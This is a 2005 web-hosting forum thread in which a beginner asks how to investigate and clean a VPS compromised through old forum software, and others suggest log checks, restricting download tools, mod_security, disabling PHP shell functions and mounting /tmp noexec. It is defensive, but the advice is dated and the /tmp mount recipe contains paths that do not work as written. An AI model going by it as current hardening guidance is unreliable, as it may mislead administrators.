Results 1 to 20 of 20
Thread: [Hacked] Now what?
-
10-20-2005, 12:23 PM #1Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
[Hacked] Now what?
Ok, just had a personal VPS hacked, which in a way is a good thing. This VPS is strictly for me to learn linux and security, and hosts a few of my personal sites.
Now, this isn't the first time its happened, but last time I just deleted phpbb, cleaned up /tmp and chmod 1777 it.
But now, r0nin has appeared, I dont believe they have root, since I have su - set up and it emails me when root logs in.
So, in /tmp there is the r0nin file, a folder called sql(left over from last time, although inactive)it contains a .htm a .txt and a php mailer. Not too worried about these as I have practised securing this vps, and my mail queue is still empty.
So, the question is how do I find out who owns the files, where do I look to see how they did it, and by which domain? After I have found these things out I will be mounting /tmp noexec, nosuid etc
Thanks, PhilipBTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-20-2005, 12:40 PM #2Web Hosting Evangelist
- Join Date
- Sep 2005
- Location
- Essex, England
- Posts
- 548
The bash command history will come in handy in your case, I think.
-
10-20-2005, 02:47 PM #3Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
ls -alh /tmp
will show the owner, it is probably nobody. Look at the apache logs to find out where it came from, they may have something.
Nonexec/nosuid will not help against and perl programs but it will help with binary programs. Bash history probably will show nothing since they were most likely put in via a php injection.John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-20-2005, 02:52 PM #4Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Yep, its nobody all right, just going to delete now, chmod again and rid wget.
Just got rid of old version of IPB too, which i suspect was the culprit.BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-20-2005, 02:57 PM #5Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
sometimes they use curl to download files too, there are a lot of possibilities to getting files on a system.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-20-2005, 02:59 PM #6Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Thanks, need all the info I can. Only been doing this for about a month, never touched linux before hand, but i want to be able to get servers running myself at one point, rather than wait for my admin to get outta bed
BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-20-2005, 03:44 PM #7Disabled
- Join Date
- Dec 2002
- Location
- chica go go
- Posts
- 11,876
Chmod wget, curl, lynx, ftp, etc to 700. I also recommend you install mod_security for apache.
-
10-20-2005, 03:49 PM #8Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
I have mod security inctalled, but could not install a ruleset because it would break all images on the vps
BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-20-2005, 04:08 PM #9Retired Moderator
- Join Date
- Jul 2001
- Location
- Singapore
- Posts
- 1,889
Why delete those files in /tmp? For me, I would rather chmod it to 000, owned by root and chattr them so that if the same exploit from the same person or using the same method which trying to write/create the same filenames/directories won't be able to due to it is there already... ...
Just my thoughts
-
10-20-2005, 04:18 PM #10Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Darn, I deleted them 20 seconds before reading this
But thanks anyway, thats what this threads for, informationBTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-21-2005, 12:12 PM #11Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Well, i went back into top, saw a few more processes than usual so I checked /tmp and guess what, its back! How the jiggy did that happen?
Which logs do i need to check?BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-21-2005, 12:28 PM #12Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
You are probably getting exploited by the same exploit over and over. I cannot remember if ronin was one that needed a reboot. I would suggest installing mod_security and disabling uneeded php functions. Now go in and delete all the r0nin stuff and kill the processes.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-21-2005, 12:33 PM #13Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, i removed ipb and phpbb before deleting the last r0nin file.
Where do I pu the mod_security rules, last time I added them to httpd.conf(i think it was) images/css on the server stopped loading.
Thanks, PhilipBTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-21-2005, 12:41 PM #14Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
Originally posted by Philipf
I've disabled exec, shell_exec, passthru, popen and system. There is nothing exploitable on the server anymore, i removed ipb and phpbb before deleting the last r0nin file.
Where do I pu the mod_security rules, last time I added them to httpd.conf(i think it was) images/css on the server stopped loading.
Thanks, Philip
Also make sure you put the mod_sec rules below addmodule/loadmodule part but not in some If section (like something controlling image types).John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-21-2005, 01:17 PM #15Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Ok, another problem now, Im trying to secure tmp properly, using:
dd if=/dev/zero of=tmpMnt bs=1024 count=100000
mke2fs /dev/tmpMnt
mount -o loop,noexec,nosuid,rw /dev/tmpMnt /var/tmp
chmod 0777 /var/tmp
ln -s /var/tmp /tmp
Add this to your fstab
/dev/tmpMnt /var/tmp ext2 loop,noexec,nosuid,rw 0 0
But when i type mke2fs, it says command not found, so I
'locate mke2fs'
And nothing happened, so I switched it to 'locate mkfs' and it finds it, but if i use it to make /dev/tmpmnt it says file or folder not found.
Any ideas?BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-21-2005, 01:23 PM #16Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
Try:
mkfs.ext2
insteadJohn W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-21-2005, 02:23 PM #17Web Hosting Master
- Join Date
- Jan 2004
- Location
- Ellesmere Port, Wirral, UK
- Posts
- 1,540
Gives the same error
Tried with the path(/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.BTi-Hosting.co.uk High quality hosting, low low prices.
One step ahead of the competition - Today IS tomorrow.
FraudWise.Net - Fight the fraud!
-
10-21-2005, 03:10 PM #18Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
Originally posted by Philipf
Gives the same error
Tried with the path(/sbin) too but no luck, it just says mkfs.ext2: No such file or directory.John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service
-
10-22-2005, 05:25 PM #19WHT Addict
- Join Date
- Mar 2005
- Posts
- 146
What I suggest you is to recompile apache with phpsuexec enabled(you can do this with /scripts/easyapache), so apache runs in user mode rather than as nobody. So you can easily track the user , by checking the file ownership.
-
10-22-2005, 06:44 PM #20Web Hosting Guru
- Join Date
- Nov 2002
- Location
- Bay Area, California
- Posts
- 309
Hello,
I think it's great that you are learning linux
But I would say that cleaning a hacked box is an undesirable thing to do. We have a lot of years of experience here, but we still prefer to reinstall if we suspect a compromise.
The best setup for a linux box, imho, is to start on your console by turning basically everything off. Then use iptables or some such to block all traffic to the box except your own.
Then you start thinking about your services, one at a time. Look at what your os provides for that service and do research. See if there are other well known packages you might consider using for providing that service.
Read about previous security problems with each package you might use to provide the service. Look for open bug reports. Look at how active the community is in responding to bug reports on each package. See if the package has a mailing list for security announcements, and for discussing issues with other users.
Consider the code. Is it in a language you can at least read? Do you feel that if you wanted to disable a feature that had been found to be insecure you might be able to do it yourself even before a patch was announced. Does the package provide useful levels of logging in order to let you monitor (programatically) the use of the service? Do the configuration options provided by the authors look like they were considering security when they wrote it?
When you find a package you like, plan for it to be compromised and install it in a way so that even if it is compromised, an intruder will learn little or nothing, and will not gain access to other services or resources. This means use separate machines, or ip addresses, or usernames, or disk partitions, or directories, or whatever, in order to isolate this service from every other part of your system.
Then configure logging. One of the most useful things you can learn to do as a linux administrator is to write small scripts which monitor your logs. Tell your script to ignore types of lines you expect to see, and have them act, or notify you, when they see lines you don't expect to see.
Have your scripts watch the amount of use the service is getting, so you know when you have an unusual amount of usage. Have them monitor the amount of system resources the service is using so you know if it is are beginning to impact other services.
Configure iptables, or whatever, to allow traffic to reach this newly configured service. Expect that some approaches to the service will be unwanted and build a banlist for the service from the very outset.
Ideally those watcher scripts you are learning to make will be able to add ips to the banlist, and control the rate of requests for service that are permitted to pass the firewall.
omg, i must stop typing But all this is stuff you do before you even turn the service on!
LuxoreSunwave Communications
http://www.sunwave.com/
Safety - Service - Economy